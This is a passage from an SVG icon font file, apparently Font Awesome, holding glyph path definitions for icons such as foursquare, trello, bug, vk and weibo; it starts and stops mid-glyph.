d="M1173 473q0 50 -19.5 91.5t-48.5 68.5t-73 49t-82.5 34t-87.5 23l-104 24q-30 7 -44 10.5t-35 11.5t-30 16t-16.5 21t-7.5 30q0 77 144 77q43 0 77 -12t54 -28.5t38 -33.5t40 -29t48 -12q47 0 75.5 32t28.5 77q0 55 -56 99.5t-142 67.5t-182 23q-68 0 -132 -15.5
t-119.5 -47t-89 -87t-33.5 -128.5q0 -61 19 -106.5t56 -75.5t80 -48.5t103 -32.5l146 -36q90 -22 112 -36q32 -20 32 -60q0 -39 -40 -64.5t-105 -25.5q-51 0 -91.5 16t-65 38.5t-45.5 45t-46 38.5t-54 16q-50 0 -75.5 -30t-25.5 -75q0 -92 122 -157.5t291 -65.5
q73 0 140 18.5t122.5 53.5t88.5 93.5t33 131.5zM1536 256q0 -159 -112.5 -271.5t-271.5 -112.5q-130 0 -234 80q-77 -16 -150 -16q-143 0 -273.5 55.5t-225 150t-150 225t-55.5 273.5q0 73 16 150q-80 104 -80 234q0 159 112.5 271.5t271.5 112.5q130 0 234 -80
q77 16 150 16q143 0 273.5 -55.5t225 -150t150 -225t55.5 -273.5q0 -73 -16 -150q80 -104 80 -234z" />
    <glyph glyph-name="foursquare" unicode="&#xf180;" horiz-adv-x="1280" 
d="M1000 1102l37 194q5 23 -9 40t-35 17h-712q-23 0 -38.5 -17t-15.5 -37v-1101q0 -7 6 -1l291 352q23 26 38 33.5t48 7.5h239q22 0 37 14.5t18 29.5q24 130 37 191q4 21 -11.5 40t-36.5 19h-294q-29 0 -48 19t-19 48v42q0 29 19 47.5t48 18.5h346q18 0 35 13.5t20 29.5z
M1227 1324q-15 -73 -53.5 -266.5t-69.5 -350t-35 -173.5q-6 -22 -9 -32.5t-14 -32.5t-24.5 -33t-38.5 -21t-58 -10h-271q-13 0 -22 -10q-8 -9 -426 -494q-22 -25 -58.5 -28.5t-48.5 5.5q-55 22 -55 98v1410q0 55 38 102.5t120 47.5h888q95 0 127 -53t10 -159zM1227 1324
l-158 -790q4 17 35 173.5t69.5 350t53.5 266.5z" />
    <glyph glyph-name="trello" unicode="&#xf181;" 
d="M704 192v1024q0 14 -9 23t-23 9h-480q-14 0 -23 -9t-9 -23v-1024q0 -14 9 -23t23 -9h480q14 0 23 9t9 23zM1376 576v640q0 14 -9 23t-23 9h-480q-14 0 -23 -9t-9 -23v-640q0 -14 9 -23t23 -9h480q14 0 23 9t9 23zM1536 1344v-1408q0 -26 -19 -45t-45 -19h-1408
q-26 0 -45 19t-19 45v1408q0 26 19 45t45 19h1408q26 0 45 -19t19 -45z" />
    <glyph glyph-name="female" unicode="&#xf182;" horiz-adv-x="1280" 
d="M1280 480q0 -40 -28 -68t-68 -28q-51 0 -80 43l-227 341h-45v-132l247 -411q9 -15 9 -33q0 -26 -19 -45t-45 -19h-192v-272q0 -46 -33 -79t-79 -33h-160q-46 0 -79 33t-33 79v272h-192q-26 0 -45 19t-19 45q0 18 9 33l247 411v132h-45l-227 -341q-29 -43 -80 -43
q-40 0 -68 28t-28 68q0 29 16 53l256 384q73 107 176 107h384q103 0 176 -107l256 -384q16 -24 16 -53zM864 1280q0 -93 -65.5 -158.5t-158.5 -65.5t-158.5 65.5t-65.5 158.5t65.5 158.5t158.5 65.5t158.5 -65.5t65.5 -158.5z" />
    <glyph glyph-name="male" unicode="&#xf183;" horiz-adv-x="1024" 
d="M1024 832v-416q0 -40 -28 -68t-68 -28t-68 28t-28 68v352h-64v-912q0 -46 -33 -79t-79 -33t-79 33t-33 79v464h-64v-464q0 -46 -33 -79t-79 -33t-79 33t-33 79v912h-64v-352q0 -40 -28 -68t-68 -28t-68 28t-28 68v416q0 80 56 136t136 56h640q80 0 136 -56t56 -136z
M736 1280q0 -93 -65.5 -158.5t-158.5 -65.5t-158.5 65.5t-65.5 158.5t65.5 158.5t158.5 65.5t158.5 -65.5t65.5 -158.5z" />
    <glyph glyph-name="gittip" unicode="&#xf184;" 
d="M773 234l350 473q16 22 24.5 59t-6 85t-61.5 79q-40 26 -83 25.5t-73.5 -17.5t-54.5 -45q-36 -40 -96 -40q-59 0 -95 40q-24 28 -54.5 45t-73.5 17.5t-84 -25.5q-46 -31 -60.5 -79t-6 -85t24.5 -59zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103
t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="sun" unicode="&#xf185;" horiz-adv-x="1792" 
d="M1472 640q0 117 -45.5 223.5t-123 184t-184 123t-223.5 45.5t-223.5 -45.5t-184 -123t-123 -184t-45.5 -223.5t45.5 -223.5t123 -184t184 -123t223.5 -45.5t223.5 45.5t184 123t123 184t45.5 223.5zM1748 363q-4 -15 -20 -20l-292 -96v-306q0 -16 -13 -26q-15 -10 -29 -4
l-292 94l-180 -248q-10 -13 -26 -13t-26 13l-180 248l-292 -94q-14 -6 -29 4q-13 10 -13 26v306l-292 96q-16 5 -20 20q-5 17 4 29l180 248l-180 248q-9 13 -4 29q4 15 20 20l292 96v306q0 16 13 26q15 10 29 4l292 -94l180 248q9 12 26 12t26 -12l180 -248l292 94
q14 6 29 -4q13 -10 13 -26v-306l292 -96q16 -5 20 -20q5 -16 -4 -29l-180 -248l180 -248q9 -12 4 -29z" />
    <glyph glyph-name="_366" unicode="&#xf186;" 
d="M1262 233q-54 -9 -110 -9q-182 0 -337 90t-245 245t-90 337q0 192 104 357q-201 -60 -328.5 -229t-127.5 -384q0 -130 51 -248.5t136.5 -204t204 -136.5t248.5 -51q144 0 273.5 61.5t220.5 171.5zM1465 318q-94 -203 -283.5 -324.5t-413.5 -121.5q-156 0 -298 61
t-245 164t-164 245t-61 298q0 153 57.5 292.5t156 241.5t235.5 164.5t290 68.5q44 2 61 -39q18 -41 -15 -72q-86 -78 -131.5 -181.5t-45.5 -218.5q0 -148 73 -273t198 -198t273 -73q118 0 228 51q41 18 72 -13q14 -14 17.5 -34t-4.5 -38z" />
    <glyph glyph-name="archive" unicode="&#xf187;" horiz-adv-x="1792" 
d="M1088 704q0 26 -19 45t-45 19h-256q-26 0 -45 -19t-19 -45t19 -45t45 -19h256q26 0 45 19t19 45zM1664 896v-960q0 -26 -19 -45t-45 -19h-1408q-26 0 -45 19t-19 45v960q0 26 19 45t45 19h1408q26 0 45 -19t19 -45zM1728 1344v-256q0 -26 -19 -45t-45 -19h-1536
q-26 0 -45 19t-19 45v256q0 26 19 45t45 19h1536q26 0 45 -19t19 -45z" />
    <glyph glyph-name="bug" unicode="&#xf188;" horiz-adv-x="1664" 
d="M1632 576q0 -26 -19 -45t-45 -19h-224q0 -171 -67 -290l208 -209q19 -19 19 -45t-19 -45q-18 -19 -45 -19t-45 19l-198 197q-5 -5 -15 -13t-42 -28.5t-65 -36.5t-82 -29t-97 -13v896h-128v-896q-51 0 -101.5 13.5t-87 33t-66 39t-43.5 32.5l-15 14l-183 -207
q-20 -21 -48 -21q-24 0 -43 16q-19 18 -20.5 44.5t15.5 46.5l202 227q-58 114 -58 274h-224q-26 0 -45 19t-19 45t19 45t45 19h224v294l-173 173q-19 19 -19 45t19 45t45 19t45 -19l173 -173h844l173 173q19 19 45 19t45 -19t19 -45t-19 -45l-173 -173v-294h224q26 0 45 -19
t19 -45zM1152 1152h-640q0 133 93.5 226.5t226.5 93.5t226.5 -93.5t93.5 -226.5z" />
    <glyph glyph-name="vk" unicode="&#xf189;" horiz-adv-x="1920" 
d="M1917 1016q23 -64 -150 -294q-24 -32 -65 -85q-40 -51 -55 -72t-30.5 -49.5t-12 -42t13 -34.5t32.5 -43t57 -53q4 -2 5 -4q141 -131 191 -221q3 -5 6.5 -12.5t7 -26.5t-0.5 -34t-25 -27.5t-59 -12.5l-256 -4q-24 -5 -56 5t-52 22l-20 12q-30 21 -70 64t-68.5 77.5t-61 58
t-56.5 15.5q-3 -1 -8 -3.5t-17 -14.5t-21.5 -29.5t-17 -52t-6.5 -77.5q0 -15 -3.5 -27.5t-7.5 -18.5l-4 -5q-18 -19 -53 -22h-115q-71 -4 -146 16.5t-131.5 53t-103 66t-70.5 57.5l-25 24q-10 10 -27.5 30t-71.5 91t-106 151t-122.5 211t-130.5 272q-6 16 -6 27t3 16l4 6
q15 19 57 19l274 2q12 -2 23 -6.5t16 -8.5l5 -3q16 -11 24 -32q20 -50 46 -103.5t41 -81.5l16 -29q29 -60 56 -104t48.5 -68.5t41.5 -38.5t34 -14t27 5q2 1 5 5t12 22t13.5 47t9.5 81t0 125q-2 40 -9 73t-14 46l-6 12q-25 34 -85 43q-13 2 5 24q16 19 38 30q53 26 239 24
q82 -1 135 -13q20 -5 33.5 -13.5t20.5 -24t10.5 -32t3.5 -45.5t-1 -55t-2.5 -70.5t-1.5 -82.5q0 -11 -1 -42t-0.5 -48t3.5 -40.5t11.5 -39t22.5 -24.5q8 -2 17 -4t26 11t38 34.5t52 67t68 107.5q60 104 107 225q4 10 10 17.5t11 10.5l4 3l5 2.5t13 3t20 0.5l288 2
q39 5 64 -2.5t31 -16.5z" />
    <glyph glyph-name="weibo" unicode="&#xf18a;" horiz-adv-x="1792" 
d="M675 252q21 34 11 69t-45 50q-34 14 -73 1t-60 -46q-22 -34 -13 -68.5t43 -50.5t74.5 -2.5t62.5 47.5zM769 373q8 13 3.5 26.5t-17.5 18.5q-14 5 -28.5 -0.5t-21.5 -18.5q-17 -31 13 -45q14 -5 29 0.5t22 18.5zM943 266q-45 -102 -158 -150t-224 -12
q-107 34 -147.5 126.5t6.5 187.5q47 93 151.5 139t210.5 19q111 -29 158.5 -119.5t2.5 -190.5zM1255 426q-9 96 -89 170t-208.5 109t-274.5 21q-223 -23 -369.5 -141.5t-132.5 -264.5q9 -96 89 -170t208.5 -109t274.5 -21q223 23 369.5 141.5t132.5 264.5zM1563 422
q0 -68 -37 -139.5t-109 -137t-168.5 -117.5t-226 -83t-270.5 -31t-275 33.5t-240.5 93t-171.5 151t-65 199.5q0 115 69.5 245t197.5 258q169 169 341.5 236t246.5 -7q65 -64 20 -209q-4 -14 -1 -20t10 -7t14.5 0.5t13.5 3.5l6 2q139 59 246 59t153 -61q45 -63 0 -178
q-2 -13 -4.5 -20t4.5 -12.5t12 -7.5t17 -6q57 -18 103 -47t80 -81.5t34 -116.5zM1489 1046q42 -47 54.5 -108.5t-6.5 -117.5q-8 -23 -29.5 -34t-44.5 -4q-23 8 -34 29.5t-4 44.5q20 63 -24 111t-107 35q-24 -5 -45 8t-25 37q-5 24 8 44.5t37 25.5q60 13 119 -5.5t101 -65.5z
M1670 1209q87 -96 112.5 -222.5t-13.5 -241.5q-9 -27 -34 -40t-52 -4t-40 34t-5 52q28 82 10 172t-80 158q-62 69 -148 95.5t-173 8.5q-28 -6 -52 9.5t-30 43.5t9.5 51.5t43.5 29.5q123 26 244 -11.5t208 -134.5z" />
    <glyph glyph-name="renren" unicode="&#xf18b;" 
d="M1133 -34q-171 -94 -368 -94q-196 0 -367 94q138 87 235.5 211t131.5 268q35 -144 132.5 -268t235.5 -211zM638 1394v-485q0 -252 -126.5 -459.5t-330.5 -306.5q-181 215 -181 495q0 187 83.5 349.5t229.5 269.5t325 137zM1536 638q0 -280 -181 -495
q-204 99 -330.5 306.5t-126.5 459.5v485q179 -30 325 -137t229.5 -269.5t83.5 -349.5z" />
    <glyph glyph-name="_372" unicode="&#xf18c;" horiz-adv-x="1408" 
d="M1402 433q-32 -80 -76 -138t-91 -88.5t-99 -46.5t-101.5 -14.5t-96.5 8.5t-86.5 22t-69.5 27.5t-46 22.5l-17 10q-113 -228 -289.5 -359.5t-384.5 -132.5q-19 0 -32 13t-13 32t13 31.5t32 12.5q173 1 322.5 107.5t251.5 294.5q-36 -14 -72 -23t-83 -13t-91 2.5t-93 28.5
t-92 59t-84.5 100t-74.5 146q114 47 214 57t167.5 -7.5t124.5 -56.5t88.5 -77t56.5 -82q53 131 79 291q-7 -1 -18 -2.5t-46.5 -2.5t-69.5 0.5t-81.5 10t-88.5 23t-84 42.5t-75 65t-54.5 94.5t-28.5 127.5q70 28 133.5 36.5t112.5 -1t92 -30t73.5 -50t56 -61t42 -63t27.5 -56
t16 -39.5l4 -16q12 122 12 195q-8 6 -21.5 16t-49 44.5t-63.5 71.5t-54 93t-33 112.5t12 127t70 138.5q73 -25 127.5 -61.5t84.5 -76.5t48 -85t20.5 -89t-0.5 -85.5t-13 -76.5t-19 -62t-17 -42l-7 -15q1 -4 1 -50t-1 -72q3 7 10 18.5t30.5 43t50.5 58t71 55.5t91.5 44.5
t112 14.5t132.5 -24q-2 -78 -21.5 -141.5t-50 -104.5t-69.5 -71.5t-81.5 -45.5t-84.5 -24t-80 -9.5t-67.5 1t-46.5 4.5l-17 3q-23 -147 -73 -283q6 7 18 18.5t49.5 41t77.5 52.5t99.5 42t117.5 20t129 -23.5t137 -77.5z" />
    <glyph glyph-name="stack_exchange" unicode="&#xf18d;" horiz-adv-x="1280" 
d="M1259 283v-66q0 -85 -57.5 -144.5t-138.5 -59.5h-57l-260 -269v269h-529q-81 0 -138.5 59.5t-57.5 144.5v66h1238zM1259 609v-255h-1238v255h1238zM1259 937v-255h-1238v255h1238zM1259 1077v-67h-1238v67q0 84 57.5 143.5t138.5 59.5h846q81 0 138.5 -59.5t57.5 -143.5z
" />
    <glyph glyph-name="_374" unicode="&#xf18e;" 
d="M1152 640q0 -14 -9 -23l-320 -320q-9 -9 -23 -9q-13 0 -22.5 9.5t-9.5 22.5v192h-352q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h352v192q0 14 9 23t23 9q12 0 24 -10l319 -319q9 -9 9 -23zM1312 640q0 148 -73 273t-198 198t-273 73t-273 -73t-198 -198
t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="arrow_circle_alt_left" unicode="&#xf190;" 
d="M1152 736v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-352v-192q0 -14 -9 -23t-23 -9q-12 0 -24 10l-319 319q-9 9 -9 23t9 23l320 320q9 9 23 9q13 0 22.5 -9.5t9.5 -22.5v-192h352q13 0 22.5 -9.5t9.5 -22.5zM1312 640q0 148 -73 273t-198 198t-273 73t-273 -73t-198 -198
t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="_376" unicode="&#xf191;" 
d="M1024 960v-640q0 -26 -19 -45t-45 -19q-20 0 -37 12l-448 320q-27 19 -27 52t27 52l448 320q17 12 37 12q26 0 45 -19t19 -45zM1280 160v960q0 13 -9.5 22.5t-22.5 9.5h-960q-13 0 -22.5 -9.5t-9.5 -22.5v-960q0 -13 9.5 -22.5t22.5 -9.5h960q13 0 22.5 9.5t9.5 22.5z
M1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="dot_circle_alt" unicode="&#xf192;" 
d="M1024 640q0 -106 -75 -181t-181 -75t-181 75t-75 181t75 181t181 75t181 -75t75 -181zM768 1184q-148 0 -273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273t-73 273t-198 198t-273 73zM1536 640q0 -209 -103 -385.5t-279.5 -279.5
t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="_378" unicode="&#xf193;" horiz-adv-x="1664" 
d="M1023 349l102 -204q-58 -179 -210 -290t-339 -111q-156 0 -288.5 77.5t-210 210t-77.5 288.5q0 181 104.5 330t274.5 211l17 -131q-122 -54 -195 -165.5t-73 -244.5q0 -185 131.5 -316.5t316.5 -131.5q126 0 232.5 65t165 175.5t49.5 236.5zM1571 249l58 -114l-256 -128
q-13 -7 -29 -7q-40 0 -57 35l-239 477h-472q-24 0 -42.5 16.5t-21.5 40.5l-96 779q-2 17 6 42q14 51 57 82.5t97 31.5q66 0 113 -47t47 -113q0 -69 -52 -117.5t-120 -41.5l37 -289h423v-128h-407l16 -128h455q40 0 57 -35l228 -455z" />
    <glyph glyph-name="vimeo_square" unicode="&#xf194;" 
d="M1292 898q10 216 -161 222q-231 8 -312 -261q44 19 82 19q85 0 74 -96q-4 -57 -74 -167t-105 -110q-43 0 -82 169q-13 54 -45 255q-30 189 -160 177q-59 -7 -164 -100l-81 -72l-81 -72l52 -67q76 52 87 52q57 0 107 -179q15 -55 45 -164.5t45 -164.5q68 -179 164 -179
q157 0 383 294q220 283 226 444zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="_380" unicode="&#xf195;" horiz-adv-x="1152" 
d="M1152 704q0 -191 -94.5 -353t-256.5 -256.5t-353 -94.5h-160q-14 0 -23 9t-9 23v611l-215 -66q-3 -1 -9 -1q-10 0 -19 6q-13 10 -13 26v128q0 23 23 31l233 71v93l-215 -66q-3 -1 -9 -1q-10 0 -19 6q-13 10 -13 26v128q0 23 23 31l233 71v250q0 14 9 23t23 9h160
q14 0 23 -9t9 -23v-181l375 116q15 5 28 -5t13 -26v-128q0 -23 -23 -31l-393 -121v-93l375 116q15 5 28 -5t13 -26v-128q0 -23 -23 -31l-393 -121v-487q188 13 318 151t130 328q0 14 9 23t23 9h160q14 0 23 -9t9 -23z" />
    <glyph glyph-name="plus_square_o" unicode="&#xf196;" horiz-adv-x="1408" 
d="M1152 736v-64q0 -14 -9 -23t-23 -9h-352v-352q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v352h-352q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h352v352q0 14 9 23t23 9h64q14 0 23 -9t9 -23v-352h352q14 0 23 -9t9 -23zM1280 288v832q0 66 -47 113t-113 47h-832
q-66 0 -113 -47t-47 -113v-832q0 -66 47 -113t113 -47h832q66 0 113 47t47 113zM1408 1120v-832q0 -119 -84.5 -203.5t-203.5 -84.5h-832q-119 0 -203.5 84.5t-84.5 203.5v832q0 119 84.5 203.5t203.5 84.5h832q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="_382" unicode="&#xf197;" horiz-adv-x="2176" 
d="M620 416q-110 -64 -268 -64h-128v64h-64q-13 0 -22.5 23.5t-9.5 56.5q0 24 7 49q-58 2 -96.5 10.5t-38.5 20.5t38.5 20.5t96.5 10.5q-7 25 -7 49q0 33 9.5 56.5t22.5 23.5h64v64h128q158 0 268 -64h1113q42 -7 106.5 -18t80.5 -14q89 -15 150 -40.5t83.5 -47.5t22.5 -40
t-22.5 -40t-83.5 -47.5t-150 -40.5q-16 -3 -80.5 -14t-106.5 -18h-1113zM1739 668q53 -36 53 -92t-53 -92l81 -30q68 48 68 122t-68 122zM625 400h1015q-217 -38 -456 -80q-57 0 -113 -24t-83 -48l-28 -24l-288 -288q-26 -26 -70.5 -45t-89.5 -19h-96l-93 464h29
q157 0 273 64zM352 816h-29l93 464h96q46 0 90 -19t70 -45l288 -288q4 -4 11 -10.5t30.5 -23t48.5 -29t61.5 -23t72.5 -10.5l456 -80h-1015q-116 64 -273 64z" />
    <glyph glyph-name="_383" unicode="&#xf198;" horiz-adv-x="1664" 
d="M1519 760q62 0 103.5 -40.5t41.5 -101.5q0 -97 -93 -130l-172 -59l56 -167q7 -21 7 -47q0 -59 -42 -102t-101 -43q-47 0 -85.5 27t-53.5 72l-55 165l-310 -106l55 -164q8 -24 8 -47q0 -59 -42 -102t-102 -43q-47 0 -85 27t-53 72l-55 163l-153 -53q-29 -9 -50 -9
q-61 0 -101.5 40t-40.5 101q0 47 27.5 85t71.5 53l156 53l-105 313l-156 -54q-26 -8 -48 -8q-60 0 -101 40.5t-41 100.5q0 47 27.5 85t71.5 53l157 53l-53 159q-8 24 -8 47q0 60 42 102.5t102 42.5q47 0 85 -27t53 -72l54 -160l310 105l-54 160q-8 24 -8 47q0 59 42.5 102
t101.5 43q47 0 85.5 -27.5t53.5 -71.5l53 -161l162 55q21 6 43 6q60 0 102.5 -39.5t42.5 -98.5q0 -45 -30 -81.5t-74 -51.5l-157 -54l105 -316l164 56q24 8 46 8zM725 498l310 105l-105 315l-310 -107z" />
    <glyph glyph-name="_384" unicode="&#xf199;" 
d="M1248 1408q119 0 203.5 -84.5t84.5 -203.5v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960zM1280 352v436q-31 -35 -64 -55q-34 -22 -132.5 -85t-151.5 -99q-98 -69 -164 -69v0v0q-66 0 -164 69
q-47 32 -142 92.5t-142 92.5q-12 8 -33 27t-31 27v-436q0 -40 28 -68t68 -28h832q40 0 68 28t28 68zM1280 925q0 41 -27.5 70t-68.5 29h-832q-40 0 -68 -28t-28 -68q0 -37 30.5 -76.5t67.5 -64.5q47 -32 137.5 -89t129.5 -83q3 -2 17 -11.5t21 -14t21 -13t23.5 -13
t21.5 -9.5t22.5 -7.5t20.5 -2.5t20.5 2.5t22.5 7.5t21.5 9.5t23.5 13t21 13t21 14t17 11.5l267 174q35 23 66.5 62.5t31.5 73.5z" />
    <glyph glyph-name="_385" unicode="&#xf19a;" horiz-adv-x="1792" 
d="M127 640q0 163 67 313l367 -1005q-196 95 -315 281t-119 411zM1415 679q0 -19 -2.5 -38.5t-10 -49.5t-11.5 -44t-17.5 -59t-17.5 -58l-76 -256l-278 826q46 3 88 8q19 2 26 18.5t-2.5 31t-28.5 13.5l-205 -10q-75 1 -202 10q-12 1 -20.5 -5t-11.5 -15t-1.5 -18.5t9 -16.5
t19.5 -8l80 -8l120 -328l-168 -504l-280 832q46 3 88 8q19 2 26 18.5t-2.5 31t-28.5 13.5l-205 -10q-7 0 -23 0.5t-26 0.5q105 160 274.5 253.5t367.5 93.5q147 0 280.5 -53t238.5 -149h-10q-55 0 -92 -40.5t-37 -95.5q0 -12 2 -24t4 -21.5t8 -23t9 -21t12 -22.5t12.5 -21
t14.5 -24t14 -23q63 -107 63 -212zM909 573l237 -647q1 -6 5 -11q-126 -44 -255 -44q-112 0 -217 32zM1570 1009q95 -174 95 -369q0 -209 -104 -385.5t-279 -278.5l235 678q59 169 59 276q0 42 -6 79zM896 1536q182 0 348 -71t286 -191t191 -286t71 -348t-71 -348t-191 -286
t-286 -191t-348 -71t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71zM896 -215q173 0 331.5 68t273 182.5t182.5 273t68 331.5t-68 331.5t-182.5 273t-273 182.5t-331.5 68t-331.5 -68t-273 -182.5t-182.5 -273t-68 -331.5t68 -331.5t182.5 -273
t273 -182.5t331.5 -68z" />
    <glyph glyph-name="_386" unicode="&#xf19b;" horiz-adv-x="1792" 
d="M1086 1536v-1536l-272 -128q-228 20 -414 102t-293 208.5t-107 272.5q0 140 100.5 263.5t275 205.5t391.5 108v-172q-217 -38 -356.5 -150t-139.5 -255q0 -152 154.5 -267t388.5 -145v1360zM1755 954l37 -390l-525 114l147 83q-119 70 -280 99v172q277 -33 481 -157z" />
    <glyph glyph-name="_387" unicode="&#xf19c;" horiz-adv-x="2048" 
d="M960 1536l960 -384v-128h-128q0 -26 -20.5 -45t-48.5 -19h-1526q-28 0 -48.5 19t-20.5 45h-128v128zM256 896h256v-768h128v768h256v-768h128v768h256v-768h128v768h256v-768h59q28 0 48.5 -19t20.5 -45v-64h-1664v64q0 26 20.5 45t48.5 19h59v768zM1851 -64
q28 0 48.5 -19t20.5 -45v-128h-1920v128q0 26 20.5 45t48.5 19h1782z" />
    <glyph glyph-name="_388" unicode="&#xf19d;" horiz-adv-x="2304" 
d="M1774 700l18 -316q4 -69 -82 -128t-235 -93.5t-323 -34.5t-323 34.5t-235 93.5t-82 128l18 316l574 -181q22 -7 48 -7t48 7zM2304 1024q0 -23 -22 -31l-1120 -352q-4 -1 -10 -1t-10 1l-652 206q-43 -34 -71 -111.5t-34 -178.5q63 -36 63 -109q0 -69 -58 -107l58 -433
q2 -14 -8 -25q-9 -11 -24 -11h-192q-15 0 -24 11q-10 11 -8 25l58 433q-58 38 -58 107q0 73 65 111q11 207 98 330l-333 104q-22 8 -22 31t22 31l1120 352q4 1 10 1t10 -1l1120 -352q22 -8 22 -31z" />
    <glyph glyph-name="_389" unicode="&#xf19e;" 
d="M859 579l13 -707q-62 11 -105 11q-41 0 -105 -11l13 707q-40 69 -168.5 295.5t-216.5 374.5t-181 287q58 -15 108 -15q44 0 111 15q63 -111 133.5 -229.5t167 -276.5t138.5 -227q37 61 109.5 177.5t117.5 190t105 176t107 189.5q54 -14 107 -14q56 0 114 14v0
q-28 -39 -60 -88.5t-49.5 -78.5t-56.5 -96t-49 -84q-146 -248 -353 -610z" />
    <glyph glyph-name="uniF1A0" unicode="&#xf1a0;" 
d="M768 750h725q12 -67 12 -128q0 -217 -91 -387.5t-259.5 -266.5t-386.5 -96q-157 0 -299 60.5t-245 163.5t-163.5 245t-60.5 299t60.5 299t163.5 245t245 163.5t299 60.5q300 0 515 -201l-209 -201q-123 119 -306 119q-129 0 -238.5 -65t-173.5 -176.5t-64 -243.5
t64 -243.5t173.5 -176.5t238.5 -65q87 0 160 24t120 60t82 82t51.5 87t22.5 78h-436v264z" />
    <glyph glyph-name="f1a1" unicode="&#xf1a1;" horiz-adv-x="1792" 
d="M1095 369q16 -16 0 -31q-62 -62 -199 -62t-199 62q-16 15 0 31q6 6 15 6t15 -6q48 -49 169 -49q120 0 169 49q6 6 15 6t15 -6zM788 550q0 -37 -26 -63t-63 -26t-63.5 26t-26.5 63q0 38 26.5 64t63.5 26t63 -26.5t26 -63.5zM1183 550q0 -37 -26.5 -63t-63.5 -26t-63 26
t-26 63t26 63.5t63 26.5t63.5 -26t26.5 -64zM1434 670q0 49 -35 84t-85 35t-86 -36q-130 90 -311 96l63 283l200 -45q0 -37 26 -63t63 -26t63.5 26.5t26.5 63.5t-26.5 63.5t-63.5 26.5q-54 0 -80 -50l-221 49q-19 5 -25 -16l-69 -312q-180 -7 -309 -97q-35 37 -87 37
q-50 0 -85 -35t-35 -84q0 -35 18.5 -64t49.5 -44q-6 -27 -6 -56q0 -142 140 -243t337 -101q198 0 338 101t140 243q0 32 -7 57q30 15 48 43.5t18 63.5zM1792 640q0 -182 -71 -348t-191 -286t-286 -191t-348 -71t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191
t348 71t348 -71t286 -191t191 -286t71 -348z" />
    <glyph glyph-name="_392" unicode="&#xf1a2;" 
d="M939 407q13 -13 0 -26q-53 -53 -171 -53t-171 53q-13 13 0 26q5 6 13 6t13 -6q42 -42 145 -42t145 42q5 6 13 6t13 -6zM676 563q0 -31 -23 -54t-54 -23t-54 23t-23 54q0 32 22.5 54.5t54.5 22.5t54.5 -22.5t22.5 -54.5zM1014 563q0 -31 -23 -54t-54 -23t-54 23t-23 54
q0 32 22.5 54.5t54.5 22.5t54.5 -22.5t22.5 -54.5zM1229 666q0 42 -30 72t-73 30q-42 0 -73 -31q-113 78 -267 82l54 243l171 -39q1 -32 23.5 -54t53.5 -22q32 0 54.5 22.5t22.5 54.5t-22.5 54.5t-54.5 22.5q-48 0 -69 -43l-189 42q-17 5 -21 -13l-60 -268q-154 -6 -265 -83
q-30 32 -74 32q-43 0 -73 -30t-30 -72q0 -30 16 -55t42 -38q-5 -25 -5 -48q0 -122 120 -208.5t289 -86.5q170 0 290 86.5t120 208.5q0 25 -6 49q25 13 40.5 37.5t15.5 54.5zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960
q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="_393" unicode="&#xf1a3;" 
d="M866 697l90 27v62q0 79 -58 135t-138 56t-138 -55.5t-58 -134.5v-283q0 -20 -14 -33.5t-33 -13.5t-32.5 13.5t-13.5 33.5v120h-151v-122q0 -82 57.5 -139t139.5 -57q81 0 138.5 56.5t57.5 136.5v280q0 19 13.5 33t33.5 14q19 0 32.5 -14t13.5 -33v-54zM1199 502v122h-150
v-126q0 -20 -13.5 -33.5t-33.5 -13.5q-19 0 -32.5 14t-13.5 33v123l-90 -26l-60 28v-123q0 -80 58 -137t139 -57t138.5 57t57.5 139zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103
t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="f1a4" unicode="&#xf1a4;" horiz-adv-x="1920" 
d="M1062 824v118q0 42 -30 72t-72 30t-72 -30t-30 -72v-612q0 -175 -126 -299t-303 -124q-178 0 -303.5 125.5t-125.5 303.5v266h328v-262q0 -43 30 -72.5t72 -29.5t72 29.5t30 72.5v620q0 171 126.5 292t301.5 121q176 0 302 -122t126 -294v-136l-195 -58zM1592 602h328
